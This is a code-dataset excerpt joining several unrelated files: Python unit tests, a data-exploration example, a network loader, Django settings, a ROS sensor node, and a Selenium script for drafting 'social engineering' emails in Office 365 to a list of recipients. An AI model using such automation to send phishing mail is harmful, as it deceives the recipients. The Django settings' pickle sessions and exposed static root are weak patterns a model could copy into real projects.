self.i = self.initialized
class ABCSetTest(unittest.TestCase):
    """Tests for the internal _ABCSet helper."""

    def testAdd(self):
        """Classes already covered by another member are reduced away."""
        self.assertEqual(_ABCSet((ABC, Immutable, TestComp4, Component)),
                         _ABCSet({ABC, TestComp4}))
        self.assertEqual(_ABCSet((int, object, Number, float)),
                         _ABCSet({int, float}))
class ComponentMetaTest(unittest.TestCase):
"""Tests for ComponentMeta: class construction, subclass hooks,
attribute-name collection, implementer registration and adaptation."""
def test_constructor(self):
# name of descriptors
for name in ('attr1', 'attr2', 'attr3'):
self.assertEqual(getattr(getattr(TestComp2, name, None),
'name', None), name)
# __slots__ forced?
self.assertEqual(getattr(TestComp4, '__slots__', None), ())
self.assertEqual(getattr(TestComp5, '__slots__', None), ('_a', '_b'))
self.assertEqual(getattr(TestComp6, '__slots__', None), ('_c',))
# mixing a non-slots implementer with a slots component must fail
self.assertRaises(TypeError, ComponentMeta, 'Test',
(TestImpl, TestComp4), {})
def test_init_subclass(self):
# init_subclass turned into a class method?
meth = TestComp3.__init_subclass__
self.assertTrue(getattr(meth, '__self__', None) is TestComp3)
# __init_subclass called?
self.assertEqual(getattr(TestImpl3, 'param', None), 'P')
def test_attr_names(self):
# attr_names: attributes defined on the class itself;
# all_attr_names: including those inherited from base components
self.assertEqual(TestComp2.attr_names, ('attr1', 'attr2', 'attr3'))
self.assertEqual(TestComp2.all_attr_names,
('attr1', 'attr2', 'attr3'))
self.assertEqual(TestImpl.attr_names, ())
self.assertEqual(TestImpl.all_attr_names, ())
self.assertEqual(TestComp6.attr_names, ('c',))
self.assertEqual(TestComp6.all_attr_names, ('a', 'b', 'c'))
def test_implementer(self):
# @implementer registers virtual subclass relationships
self.assertTrue(issubclass(TestImpl, TestComp1))
self.assertTrue(issubclass(TestImpl, TestComp2))
self.assertEqual(TestImpl.__virtual_bases__, {TestComp1, TestComp2})
self.assertTrue(issubclass(TestABC, TestComp1))
def test_adaptation(self):
# NOTE(review): the add_adapter calls below mutate shared class-level
# adapter registries, and later assertions depend on the registration
# order -- keep the statement order unchanged.
# wrong component
self.assertRaises(AssertionError, TestComp2.add_adapter,
TestComp1Factory())
self.assertRaises(AssertionError, TestComp2.add_adapter,
Tuple2TestComp6)
# wrong number of args
func = lambda x, y: TestComp2()
func.__annotations__ = {'return': TestComp2, 'x': int, 'y': int}
self.assertRaises(AssertionError, TestComp2.add_adapter, func)
# variable number of args
func = lambda *args: TestComp2()
func.__annotations__ = {'return': TestComp2, 'args': int}
self.assertRaises(AssertionError, TestComp2.add_adapter, func)
# register some adapters
fct = TestComp1Factory()
TestComp1.add_adapter(fct)
self.assertIn(Number, TestComp1.__adapters__)
self.assertIn(fct, TestComp1.__adapters__[Number])
TestComp1.add_adapter(Number2TestComp1)
self.assertIn(Number2TestComp1, TestComp1.__adapters__[Number])
# registering the same adapter twice must not create a duplicate entry
TestComp1.add_adapter(Number2TestComp1)
self.assertEqual(len(TestComp1.__adapters__[Number]), 2)
TestComp2.add_adapter(Str2TestComp2)
self.assertIn(str, TestComp2.__adapters__)
self.assertIn(Str2TestComp2, TestComp2.__adapters__[str])
TestComp6.add_adapter(Tuple2TestComp6)
adapter = TestComp6.add_adapter(Obj2TestComp6)
self.assertEqual(adapter, Obj2TestComp6)
# retrieve adapters
self.assertEqual(TestComp1.get_adapter(5), Number2TestComp1)
self.assertEqual(TestComp1.get_adapter(5.0), Number2TestComp1)
self.assertRaises(ComponentLookupError, TestComp1.get_adapter, 'x')
self.assertEqual(TestComp2.get_adapter('abc'), Str2TestComp2)
self.assertRaises(ComponentLookupError, TestComp2.get_adapter, 3)
self.assertEqual(TestComp6.get_adapter((3, 1, 'x')), Tuple2TestComp6)
self.assertEqual(TestComp6.get_adapter([3, 1, 'x']), Obj2TestComp6)
self.assertEqual(TestComp6.get_adapter(TestComp6(3, 1, 'x')),
Obj2TestComp6)
self.assertEqual(TestComp4.get_adapter((3, 1, 'x')), Tuple2TestComp6)
self.assertEqual(TestComp4.get_adapter([3, 1, 'x']), Obj2TestComp6)
# adapt objects
self.assertIsInstance(TestComp1.adapt(5), TestComp1)
# __getitem__ is expected to be an alias for adapt here
self.assertIsInstance(TestComp1[5.0], TestComp1)
self.assertIsInstance(TestComp2.adapt('x'), TestComp2)
t1 = TestComp6.adapt((5, 17, 'abc'))
self.assertIsInstance(t1, TestComp6)
self.assertEqual((t1.a, t1.b, t1.c), (5, 17, 'abc'))
t2 = TestComp6.adapt(fct)
self.assertIsInstance(t2, TestComp6)
self.assertIs(t2.a, fct)
self.assertRaises(TypeError, TestComp7.adapt, t2)
# adapting an instance to one of its own (base) components is identity
t3 = TestComp6(4, 9, 'y')
for ct in (TestComp6, TestComp5, TestComp4):
self.assertIs(ct.adapt(t3), t3)
def test_repr(self):
self.assertEqual(repr(TestComp3),
'.'.join((__name__, TestComp3.__qualname__)))
class ComponentTest(unittest.TestCase):
    """Tests for Component instance construction."""

    def test_constructor(self):
        """`initialized` is False during __init__ and True afterwards."""
        comp = TestComp8(19)
        # TestComp8.__init__ stored the in-construction flag in `i`
        self.assertFalse(comp.i)
        self.assertTrue(comp.initialized)
# Run the adapter/component test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 31.12 | 78 | 0.626735 | 6,439 | 0.827635 | 0 | 0 | 193 | 0.024807 | 0 | 0 | 1,093 | 0.140488 |
5e24791c84d380b2bbc7c1f3fc43d01d827c03a9 | 1,112 | py | Python | docs/source/examples/data_exploration.py | SimulatedANeal/carpedm | 22bd5d28cfff50d7462e2a8e1b8dc1675e2a4c89 | [
"MIT"
] | 2 | 2020-09-30T04:59:06.000Z | 2021-03-30T20:42:44.000Z | docs/source/examples/data_exploration.py | SimulatedANeal/carpedm | 22bd5d28cfff50d7462e2a8e1b8dc1675e2a4c89 | [
"MIT"
] | null | null | null | docs/source/examples/data_exploration.py | SimulatedANeal/carpedm | 22bd5d28cfff50d7462e2a8e1b8dc1675e2a4c89 | [
"MIT"
] | 1 | 2018-05-25T07:15:16.000Z | 2018-05-25T07:15:16.000Z | #
# Copyright (C) 2018 Neal Digre.
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
"""Data exploration.
If this file is changed, please also change the ``:lines:`` option in
the following files where this code is referenced with the
``literalinclude`` directive.
* carpedm/data/meta.py
* ../guides/usage.rst
"""
import carpedm as dm
# Create MetaLoader objects for storing meta data over the bundled sample
# set, one per image scope: single kana characters, 3-glyph kanji
# sequences, and entire pages.
single_kana = dm.data.MetaLoader(data_dir=dm.data.sample, image_scope='char', charset=dm.data.CharacterSet('kana'))
kanji_seq = dm.data.MetaLoader(data_dir=dm.data.sample, image_scope='seq', seq_len=3, charset=dm.data.CharacterSet('kanji'))
full_page = dm.data.MetaLoader(data_dir=dm.data.sample, image_scope='page', charset=dm.data.CharacterSet('all'))
# View images from each subset.  shape presumably resizes to (height,
# width), with None leaving that dimension native -- confirm in the
# MetaLoader documentation.
single_kana.view_images(subset='train', shape=(64,64))
kanji_seq.view_images(subset='dev', shape=(None, 64))
full_page.view_images(subset='test', shape=None)
# Save the data as TFRecords (default format_store)
single_kana.generate_dataset(out_dir='/tmp/pmjtc_data', subset='train')
| 34.75 | 124 | 0.755396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.51259 |
5e24ac8f67e463350fcf36a595dd6de2bd0934f3 | 284 | py | Python | backend/czi_hosted/auth/__init__.py | danmedani/cellxgene | 26de334274dad9fdf5d162bdff810055cf176633 | [
"MIT"
] | 1 | 2021-05-13T13:27:43.000Z | 2021-05-13T13:27:43.000Z | backend/czi_hosted/auth/__init__.py | danmedani/cellxgene | 26de334274dad9fdf5d162bdff810055cf176633 | [
"MIT"
] | 7 | 2021-01-07T19:20:57.000Z | 2021-06-15T18:17:55.000Z | backend/czi_hosted/auth/__init__.py | danmedani/cellxgene | 26de334274dad9fdf5d162bdff810055cf176633 | [
"MIT"
] | 1 | 2021-11-05T02:04:22.000Z | 2021-11-05T02:04:22.000Z | # import the built in auth types so they can be registered
import backend.czi_hosted.auth.auth_test # noqa: F401
import backend.czi_hosted.auth.auth_session # noqa: F401
import backend.czi_hosted.auth.auth_oauth # noqa: F401
import backend.czi_hosted.auth.auth_none # noqa: F401
| 40.571429 | 58 | 0.795775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.373239 |
5e258998c36f2750ad77c20394970f9287298117 | 1,534 | py | Python | core/net_loader.py | nikon-petr/perceptron | 40509070e1d5c2407e5778af9bccde1eda284efb | [
"MIT"
] | null | null | null | core/net_loader.py | nikon-petr/perceptron | 40509070e1d5c2407e5778af9bccde1eda284efb | [
"MIT"
] | null | null | null | core/net_loader.py | nikon-petr/perceptron | 40509070e1d5c2407e5778af9bccde1eda284efb | [
"MIT"
] | null | null | null | import os
from json import JSONDecodeError
from json import dump
from json import load
import numpy as np
from core.net_errors import JsonFileStructureIncorrect, JsonFileNotFound
def upload(net_object, path):
    """Load a serialized network from the JSON file at *path* into *net_object*.

    Populates ``config`` (mandatory), ``tags``, ``net`` and ``deviation``
    (read from the JSON key ``'normalization'``).  Each layer's ``'w'``
    weight matrix is rehydrated as a numpy array, and a fresh zero-filled
    ``'o'`` output buffer is allocated per layer, sized by the matching
    ``config`` entry.

    Raises:
        JsonFileNotFound: if *path* does not point to an existing file.
        JsonFileStructureIncorrect: if the mandatory 'config' key is missing.
        json.JSONDecodeError: if the file is not valid JSON.
    """
    if not os.path.isfile(path):
        raise JsonFileNotFound()
    try:
        with open(path, 'r') as file:
            deserialized_file = load(file)
        net_object.config = deserialized_file['config']
        net_object.tags = deserialized_file.get('tags')
        net_object.net = deserialized_file.get('net')
        # NOTE(review): unload() writes this value back from the attribute
        # `net_object.normalization`; confirm the `deviation` name here is
        # intentional and not a leftover from a rename.
        net_object.deviation = deserialized_file.get('normalization')
        if net_object.net:
            for layer_idx in range(1, len(net_object.config)):
                layer = net_object.net[layer_idx - 1]
                layer['w'] = np.array(layer['w'])
                layer['o'] = np.zeros((net_object.config[layer_idx]))
    except KeyError as exc:
        # Chain the original KeyError so the missing key shows up in the
        # traceback.  (A previous `except JSONDecodeError: raise` handler
        # was a no-op and has been removed; decode errors still propagate.)
        raise JsonFileStructureIncorrect() from exc
def unload(net_object, path):
    """Serialize *net_object* to pretty-printed, key-sorted JSON at *path*.

    Only the ``'w'`` weight matrix of each layer is persisted (converted
    from numpy arrays to nested lists); transient ``'o'`` output buffers
    are deliberately dropped.

    NOTE(review): this writes ``net_object.normalization`` under the JSON
    key ``'normalization'``, while upload() reads that key back into
    ``net_object.deviation`` -- confirm which attribute name the rest of
    the project expects.
    """
    # Numpy arrays are not JSON serializable, so copy each layer's weights
    # out as plain nested lists first.
    net_copy = [{'w': layer['w'].tolist()} for layer in net_object.net]
    file_dictionary = {
        'config': net_object.config,
        'tags': net_object.tags,
        'net': net_copy,
        'normalization': net_object.normalization
    }
    # (The previous `except JSONDecodeError: raise` wrapper was dead code:
    # json.dump never raises JSONDecodeError, and a bare re-raise changes
    # nothing.  Any serialization error still propagates unchanged.)
    with open(path, 'w') as file:
        dump(file_dictionary, file, sort_keys=True, indent=4)
| 30.68 | 85 | 0.595828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 89 | 0.058018 |
5e25ad68634e5c0fbd0c26e49c6c7143c51f61a8 | 5,292 | py | Python | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | """
Django settings for analytics project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from config import system
from config import database
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# (Sourced from config/system.py rather than being hard-coded here.)
SECRET_KEY = system.APP_SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = system.DEBUG
ALLOWED_HOSTS = ['0.0.0.0', 'localhost']
# Session serializers
# NOTE(review): PickleSerializer deserializes arbitrary pickles from the
# session store; Django's default JSONSerializer is safer -- confirm that
# pickle is actually required here.
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Application definition
# Django contrib apps plus corsheaders and this project's local apps
# ('lead', 'fund', 'partner').
INSTALLED_APPS = [
    'corsheaders',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'lead',
    'fund',
    'partner',
]
# NOTE(review): django-cors-headers recommends placing CorsMiddleware as
# high as possible (before CommonMiddleware); here it sits last -- verify
# CORS headers are actually applied to responses.
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'corsheaders.middleware.CorsMiddleware',
]
# App urls
ROOT_URLCONF = 'analytics.urls'
# Cross-origin allowance is driven by config/system.py.
CORS_ORIGIN_ALLOW_ALL = system.CORS_ORIGIN_ALLOW
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            BASE_DIR + system.TEMPLATE_PATH, # base templates
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
# Redis-backed cache; TIMEOUT None means cached entries never expire.
CACHES = {
    "default": {
        "BACKEND": "django_redis.cache.RedisCache",
        "LOCATION": "redis://127.0.0.1:6379/1",
        "TIMEOUT": None,
        "OPTIONS": {
            "MAX_ENTRIES": 1000,
            "CLIENT_CLASS": "django_redis.client.DefaultClient",
            "CONNECTION_POOL_KWARGS": {"max_connections": 100}
        }
    }
}
WSGI_APPLICATION = 'analytics.wsgi.application'
LOGIN_URL = '/login/'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# One Django DATABASES entry is generated per connection declared in
# config/database.py.
DATABASES = {
    db: {
        "ENGINE": database.config[db]["ENGINE"],
        "NAME": database.config[db]["DB_NAME"],
        "USER": database.config[db]["USERNAME"],
        "PASSWORD": database.config[db]["PASSWORD"],
        "HOST": database.config[db]["HOST"],
        "PORT": database.config[db]["PORT"]
    }
    for db in database.config
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Calcutta'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
# Directory where static files are stored
# NOTE(review): the second entry makes the entire project root (BASE_DIR)
# servable as static content, which can expose source files -- confirm
# this is intended.
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, "static"),
    BASE_DIR + "/",
]
# NOTE(review): STATIC_URL is normally a URL prefix such as '/static/',
# not a filesystem path -- verify.
STATIC_URL = STATICFILES_DIRS[1]
# Scratch directory for temporary files, under the project root.
FILES_DIR = os.path.join(BASE_DIR, system.TEMP_FOLDER)
# logger settings
# dictConfig-style logging: django, 'bo' and django.request all write to
# ./logs.log at DEBUG level using the 'verbose' formatter.
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {
        "verbose": {
            "format": "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
            "datefmt": "%d/%b/%Y %H:%M:%S"
        },
        "simple": {
            "format": "%(levelname)s %(message)s"
        },
    },
    "handlers": {
        "file": {
            "level": "DEBUG",
            "class": "logging.FileHandler",
            "filename": "logs.log",
            "formatter": "verbose"
        },
    },
    "loggers": {
        "django": {
            "handlers": ["file"],
            "propagate": True,
            "level": "DEBUG",
        },
        "bo": {
            "handlers": ["file"],
            "level": "DEBUG",
        },
        # Logged directly by its own handler; propagate=False avoids
        # duplicate records via the parent 'django' logger.
        "django.request": {
            "handlers": ["file"],
            "level": "DEBUG",
            "propagate": False,
        },
    }
}
# RQ Queues
RQ_QUEUES = {
'default': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
'PASSWORD': 'some-password',
'DEFAULT_TIMEOUT': 360,
},
'high': {
'URL': os.getenv('REDISTOGO_URL', 'redis://localhost:6379/0'), # If you're on Heroku
'DEFAULT_TIMEOUT': 500,
},
'low': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
}
} | 24.164384 | 92 | 0.655518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,396 | 0.641723 |
5e261f4a29f9c6da5e5d39b2f670faea1fe9471d | 4,396 | py | Python | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | """
The Office 365 Social Engineering Email draft producer uses a customized
library of methods in this master class to maintain continuous delivery.
This repository is controlled by a single boolean that is set to false by
default. Please ensure that the emailDraft.py file is correct.
"""
# Built-in Imports
import os
# SeleniumBase Web Application Testing Framework
from seleniumbase import BaseCase
# Selenium Exception Imports
from selenium.common.exceptions import NoSuchElementException
# Logging Import Setup
import logging
# Absolute path of this module's log file and the record layout used below.
filename = '/SeleniumBase/production/tests/O365SEEmailLog/test.log'
# NOTE(review): `format` shadows the builtin of the same name at module
# scope; consider renaming these to LOG_FILE / LOG_FORMAT.
format = '%(asctime)s %(levelname)s: %(message)s'
# Logging file setup
# `encoding=` requires Python 3.9+, and basicConfig fails if the log
# directory does not already exist -- TODO confirm both in deployment.
logging.basicConfig(filename=filename, format=format,
                    encoding='utf-8', level=logging.INFO)
class BaseTestCase(BaseCase):
    """Shared SeleniumBase scaffold for the O365 social-engineering suite.

    Adds a tolerant CSS-selector click helper plus the createEmail /
    createEmails flow, which logs into Office 365 and prepares draft
    messages driven entirely by O365_SE_* environment variables.
    """
    def setUp(self):
        """Standard SeleniumBase setup; suite-specific setup goes after it."""
        super(BaseTestCase, self).setUp()
        # <<< Run custom setUp() code for tests AFTER the super().setUp() >>>
    def tearDown(self):
        """Capture a screenshot, branch on pass/fail, then defer to SeleniumBase."""
        self.save_teardown_screenshot()
        if self.has_exception():
            # <<< Run custom code if the test failed. >>>
            pass
        else:
            # <<< Run custom code if the test passed. >>>
            pass
        # (Wrap unreliable tearDown() code in a try/except block.)
        # <<< Run custom tearDown() code BEFORE the super().tearDown() >>>
        super(BaseTestCase, self).tearDown()
    def clickCSSObject(self, CSSSelector):
        """Click *CSSSelector* if present; otherwise log the page source.

        Failures are reported via print/logging rather than raised, so a
        missing element does not abort the whole email flow.
        """
        if self.is_element_present(CSSSelector):
            try:
                self.click(CSSSelector)
                print('CSS Object found: {0}'.format(CSSSelector))
            except NoSuchElementException as exc:
                print(exc)
                print('CSS Object not found: {0}'.format(CSSSelector))
        else:
            print('CSS Object not found: {0}'.format(CSSSelector))
            source = self.get_page_source()
            logging.warning(source)
    def createEmail(self, email):
        """Fill out one draft addressed to *email*.

        Cc, subject and body come from the O365_SE_TO / O365_SE_SUBJECT /
        O365_SE_MESSAGE environment variables (empty string when unset);
        the draft is then marked high importance via the compose menu.
        """
        toInput = 'input[aria-label="To"]'
        ccInput = 'input[aria-label="Cc"]'
        cc = os.getenv('O365_SE_TO', '')
        subjectInput = 'input[aria-label="Add a subject"]'
        subject = os.getenv('O365_SE_SUBJECT', '')
        messageInput = 'input[aria-label="Message body"]'
        message = os.getenv('O365_SE_MESSAGE', '')
        moreOptions = '#compose_ellipses_menu'
        importance = 'button[aria-label="Set importance"]'
        highImportance = 'button[name="High"]'
        clickChain1 = [moreOptions, importance, highImportance]
        showMessageOptions = 'button[aria-label="Show message options..."]'
        self.type(toInput, email)
        self.type(ccInput, cc)
        self.type(subjectInput, subject)
        self.type(messageInput, message)
        # Walk the "..." menu to set high importance, 0.1s between clicks.
        self.click_chain(clickChain1, spacing=0.1)
        self.clickCSSObject(showMessageOptions)
    def createEmails(self):
        """Log into office.com, open Outlook, and create one draft per
        whitespace-separated address in O365_SE_EMAILS.
        """
        # <<< Load welcome page markdown. >>>
        # Reduce duplicate code in tests by having reusable methods like this.
        # If the UI changes, the fix can be applied in one place.
        self.open('https://office.com/')
        loginBtn = 'div[class="mectrl_header_text mectrl_truncate"]'
        usernameInput = '#i0116'
        username = os.getenv('O365_SE_USERNAME', 'testUser')
        nextBtn = '#idSIButton9'
        passwordInput = '#i0118'
        password = os.getenv('O365_SE_PASSWORD', 'testPass')
        doNotRetainCreds = '#idBtn_Back'
        # outlook1 = 'a[aria-label="Outlook"]'
        outlook = 'a[id="ShellMail_link"]'
        # outlook3 = '#20AC5DE0-9796-4393-8656-9711B92C5223'
        # NOTE(review): '#id__6' looks like an auto-generated id and is
        # likely brittle across Outlook UI revisions.
        newMessage1 = '#id__6'
        # newMessage2 = '#id__1718'
        self.clickCSSObject(loginBtn)
        self.clickCSSObject(usernameInput)
        self.type(usernameInput, username)
        self.clickCSSObject(nextBtn)
        self.type(passwordInput, password)
        self.clickCSSObject(nextBtn)
        self.clickCSSObject(doNotRetainCreds)
        # self.clickCSSObject(outlook1)
        self.wait_for_element(outlook)
        self.clickCSSObject(outlook)
        # self.clickCSSObject(outlook3)
        self.wait_for_element(newMessage1)
        self.clickCSSObject(newMessage1)
        # self.clickCSSObject(newMessage2)
        stringList = os.getenv('O365_SE_EMAILS', '')
        emailList = stringList.split()
        for email in emailList:
            self.createEmail(email)
| 39.25 | 78 | 0.64354 | 3,605 | 0.820064 | 0 | 0 | 0 | 0 | 0 | 0 | 1,830 | 0.416288 |
5e26733308ed8f42d4be84bd5ccccd072a511eca | 1,357 | py | Python | test.py | FirstDraftGIS/is-a-place-counter | 2af139da34c575101bbd4545e889298682fc3487 | [
"MIT"
] | 1 | 2019-02-15T15:17:41.000Z | 2019-02-15T15:17:41.000Z | test.py | FirstDraftGIS/is-a-place-counter | 2af139da34c575101bbd4545e889298682fc3487 | [
"MIT"
] | null | null | null | test.py | FirstDraftGIS/is-a-place-counter | 2af139da34c575101bbd4545e889298682fc3487 | [
"MIT"
] | null | null | null | from datetime import datetime
from csv import DictReader
from numpy import mean
from numpy import median
import pickle
import unittest
from config import path_to_pickled_counter
from config import path_to_tsv
class TestDataMethods(unittest.TestCase):
    """Sanity checks over the pickled name counter and the yes/no TSV table."""

    @classmethod
    def setUpClass(cls):
        # Load both data sources once for every test in the class.
        with open(path_to_pickled_counter, "rb") as handle:
            cls.counter = pickle.load(handle)
        with open(path_to_tsv) as handle:
            cls.rows = [
                {"name": record["name"],
                 "yes": int(record["yes"]),
                 "no": int(record["no"])}
                for record in DictReader(handle, delimiter="\t")
            ]

    def test_row_count(self):
        """Both sources cover the same (large) set of names."""
        self.assertGreaterEqual(len(self.rows), 200000)
        self.assertEqual(len(self.counter), len(self.rows))

    def test_total_counts(self):
        """Each source records at least a million yes/no votes in total."""
        tsv_votes = sum(record["yes"] + record["no"] for record in self.rows)
        self.assertGreaterEqual(tsv_votes, 1e6)
        counter_votes = sum(sum(counts.values()) for counts in self.counter.values())
        self.assertGreaterEqual(counter_votes, 1e6)

    def test_median_percentage_yes(self):
        """Most names are never 'yes', yet a sizable minority usually are."""
        shares = [record["yes"] / (record["yes"] + record["no"]) for record in self.rows]
        self.assertEqual(median(shares), 0)
        self.assertGreaterEqual(mean(shares), 0.05)
        majority_yes = sum(1 for share in shares if share > 0.5)
        self.assertGreaterEqual(majority_yes, 13000)
# Allow running the data-sanity suite directly: `python test.py`.
if __name__ == '__main__':
    unittest.main()
| 35.710526 | 132 | 0.659543 | 1,097 | 0.808401 | 0 | 0 | 303 | 0.223287 | 0 | 0 | 71 | 0.052321 |
5e29ce6a0e41b1a83ed81d1c6dec37481ec7d6e5 | 2,950 | py | Python | scalpel/utils/sensor.py | straizys/elliptical-excision-force-model | c30619ea3879de38b5643c0c31946e2db57dafbc | [
"MIT"
] | null | null | null | scalpel/utils/sensor.py | straizys/elliptical-excision-force-model | c30619ea3879de38b5643c0c31946e2db57dafbc | [
"MIT"
] | null | null | null | scalpel/utils/sensor.py | straizys/elliptical-excision-force-model | c30619ea3879de38b5643c0c31946e2db57dafbc | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys, serial
import numpy as np
from collections import deque
import itertools
import csv
from datetime import datetime
import time
import rospy
from std_msgs.msg import Int32MultiArray
class Sensor:
    """Reads a two-coil sensor over a serial port and keeps rolling buffers
    of the active coil, reference coil, and drift-compensated differential
    readings (newest sample at index 0 of each deque).
    """
    def __init__(self, strPort, maxLen):
        # 9600 baud; writing b'2' asks the firmware to start streaming.
        self.ser = serial.Serial(strPort, 9600)
        self.ser.write(b'2') # start the data stream
        line = self.ser.readline() # discard the first (possibly partial) line
        print(line)
        self.ax = deque([0.0] * maxLen) # active coil
        self.ay = deque([0.0] * maxLen) # reference coil
        self.az = deque([0.0] * maxLen) # differential, drift compensated
        self.maxLen = maxLen
        self.run = False        # True once the first sample has seeded `base`
        self.base = 0           # slowly-tracked baseline for drift compensation
        self.trackPause = False # True while the signal jumps far above baseline
        # print('calibration')
        # self.cali = self.calibration()
    def addToBuf(self, buf, val):
        """Push *val* as the newest (left) element of *buf*, capped at maxLen.

        The buffers are pre-filled to maxLen in __init__, so in practice the
        pop/appendleft branch is always taken.
        """
        if len(buf) < self.maxLen:
            buf.append(val)
        else:
            buf.pop()
            buf.appendleft(val)
    def add(self, data):
        """Ingest one raw sample pair into the three buffers.

        Each token appears to be b'<tag><hexdigits>': the first byte is a
        channel tag that is dropped, the remainder parsed as hex -- TODO
        confirm against the firmware protocol.
        """
        assert (len(data) == 2)
        self.addToBuf(self.ax, int(data[0][1:], 16))
        self.addToBuf(self.ay, int(data[1][1:], 16))
        diff = int(data[0][1:], 16) - int(data[1][1:], 16)
        data = self.track_base(diff)
        self.addToBuf(self.az, data)
    def track_base(self, datain):
        """Return *datain* relative to a slowly-drifting baseline.

        The baseline creeps by +/-300 per sample toward the signal, but
        tracking pauses while the sample sits more than 3000 above the
        baseline (treated as a genuine event rather than drift).
        """
        if (datain - self.base) > 3000:
            self.trackPause = True
        else:
            self.trackPause = False
        if not self.run:
            # First sample ever: seed the baseline directly.
            self.base = datain
            self.run = True
        else:
            if not self.trackPause:
                if datain > self.base:
                    self.base += 300
                else:
                    self.base -= 300
        data = datain - self.base
        return data
    def update(self):
        """Read one line from the serial port and ingest its first two tokens."""
        line = self.ser.readline()
        data = [val for val in line.split()]
        self.add(data[:2])
    def close(self):
        # Flush pending output and close the serial port.
        self.ser.flush()
        self.ser.close()
    def calibration(self):
        """Average 100 raw samples per coil; returns a 2-element mean array.

        Currently unused (see the commented-out call in __init__).
        """
        cal_len = 100
        cal_val = np.zeros([2, cal_len])
        for i in range(cal_len):
            line = self.ser.readline() # one raw sample line per iteration
            data = [val for val in line.split()]
            cal_val[0, i] = int(data[0][1:], 16)
            cal_val[1, i] = int(data[1][1:], 16)
        return cal_val.mean(axis=1)
def main():
    """Publish sensor readings to the 'sensor' ROS topic at 100 Hz until shutdown."""
    strPort = '/dev/ttyACM0'
    print('reading from serial port %s...' % strPort)
    sensor = Sensor(strPort, 100)
    pub = rospy.Publisher('sensor', Int32MultiArray, queue_size=10)
    rospy.init_node('sensor_node', anonymous=True)
    rate = rospy.Rate(100)
    while not rospy.is_shutdown():
        sensor.update()
        # Newest sample from each buffer: [active, reference, compensated].
        data_to_send = Int32MultiArray()
        data_to_send.data = np.asarray([sensor.ax[0],sensor.ay[0],sensor.az[0]])
        pub.publish(data_to_send)
        rate.sleep()
# Start the publisher node when run as a script (e.g. via rosrun).
if __name__ == '__main__':
    main()
| 25.431034 | 80 | 0.553559 | 2,174 | 0.736949 | 0 | 0 | 0 | 0 | 0 | 0 | 304 | 0.103051 |
5e29eba4a3cf0f4a96a10f81ab236f70af7ead6e | 2,847 | py | Python | tests/test_play_turn.py | Avashist1998/tictactoe-abhay | e2a023234b4c903879d2d819997a579eb9e649d0 | [
"MIT"
] | null | null | null | tests/test_play_turn.py | Avashist1998/tictactoe-abhay | e2a023234b4c903879d2d819997a579eb9e649d0 | [
"MIT"
